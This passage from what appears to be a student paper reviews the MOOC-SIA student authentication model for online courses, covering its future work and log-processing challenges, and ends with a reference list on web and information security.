the different authentication methods of the MOOC platform in a centralized fashion.

To explain an architectural view of the example application and the solution for their case
study, the authors provided a figure illustrating the MOOC-SIA model and showed a use-case
example. Firstly, the course designer, who is working on a specific assessment activity,
creates a new CCAL by selecting the most suitable authentication methods for this particular
assessment using the ALD module. To this end, the course designer selects public PKI,
double verification (e.g. first login and password, then an SMS code) and a biometric method
(e.g. the participant's fingerprint).

• Future works and Recommendation:

On-going work is to provide an implementation prototype of their model, integrated in a real
LMS, and to experiment with it. They plan to explore the use of distributed infrastructures in
the prototype to gain performance when using real-time user tracking and data processing
techniques.

Certain LMSs, even though they support multiple authentication methods, cannot apply them
simultaneously per user, method, etc. Additionally, implementing MOOC-SIA and integrating
it into an existing LMS may be a challenge. Providing real-time user tracking for student
verification in MOOCs by means of EDM techniques involves processing large amounts of
information in a great variety of formats and types. MOOC sessions are characterized by a high
degree of user-user and user-system interaction, producing huge amounts of valuable data that
are typically stored in server log files. As a consequence, treating this information is very
costly in time and space and needs a great processing effort, thus requiring high performance
computational power, which may become an issue to consider.

Furthermore, although the requirements for their authentication model have been elicited
from a hypothetical case study and these requirements are involved in an actual UOC
scenario, there are variables which should be considered in further work in order to test the
accuracy of its authentication methods and of the MOOC-SIA model. Among these variables,
they may consider the amount of data to be processed and the time needed to train the system.

With regard to the future implementation prototypes of their model, the authors should
consider the problem of massive log file processing in the UOC Open Courseware
framework. These log files are made up of millions of lines, each representing an operation
performed by a particular user; their size keeps growing, and the event information kept in
them is highly varied. Their model's prototypes should therefore be able to correctly collect
and store the learning activity, and to increase the efficiency of the analysis stages and later
data processing, in order to implement EDM techniques focused on real-time and offline data
analysis for authentication anomaly detection.

References

VMware, Inc. (2017, June 01). Welcome to VMware. Retrieved from https://www.vmware.com/

Alec Yasinsac, J. F. (2017, June 02). Developing an Academic Security Laboratory. Retrieved from http://www.cisse.info/history/CISSE%20J/2002/yasi.pdf

Arachni. (2017, June 01). Web Application Security Scanner Framework. Retrieved from Arachni: http://www.arachni-scanner.com/

Bernardo Damele A. G., M. S. (2016). sqlmap: Automatic SQL injection and database takeover tool. Retrieved from http://sqlmap.org/

C. Acuna, D. (2016). Effects of a Comprehensive Computer Security Policy on Computer Security Culture. MWAIS 2016.

D'Arcy, J. &. (2007). Deterring Internal Information System Misuse. Communications of the ACM, 113-117.

D'Arcy, J. H. (2012). Employee Misuse of Information Technology Resources: Testing a Contemporary Deterrence Model. Decision Sciences, 1091-1124.

Linux, K. (2017, June 03). Our Most Advanced Penetration Testing Distribution, Ever. Retrieved from Kali by Offensive Security: https://www.kali.org/

Perez, T. (2015, May 18). Website Security: How Do Websites Get Hacked? Retrieved from https://blog.sucuri.net/2015/05/website-security-how-do-websites-get-hacked.html

Prieto, J. M. (2013, June 12). Providing Information Security to MOOC: Towards Effective Student Authentication. Retrieved June 2, 2017, from IEEE: http://ieeexplore.ieee.org/abstract/document/6630424/?reload=true

Sarah Morse, studioD. (2016). The Negative Effects of Hackers. Retrieved from Tech in Our Everyday Life: http://techin.oureverydaylife.com/negative-effects-hackers-2867.html

Swarnaprabha Patil, P. N. (2015). Web Security Attack and Injection. International Journal of Advancements in Research & Technology.

Ulfar Erlingsson a, B. L. (n.d.). End-to-End Web Application Security.

Warren, M. &. (2009). Hacker Taggers: A New Type of Hackers. Information Systems Frontiers.

Xue, X. L. (n.d.). A Survey on Web Application Security. Vanderbilt University.

Z. Omary, D. a. (2011). Towards Using Social Network and Internet-enabled Mobile Devices for Learning. Preparedness.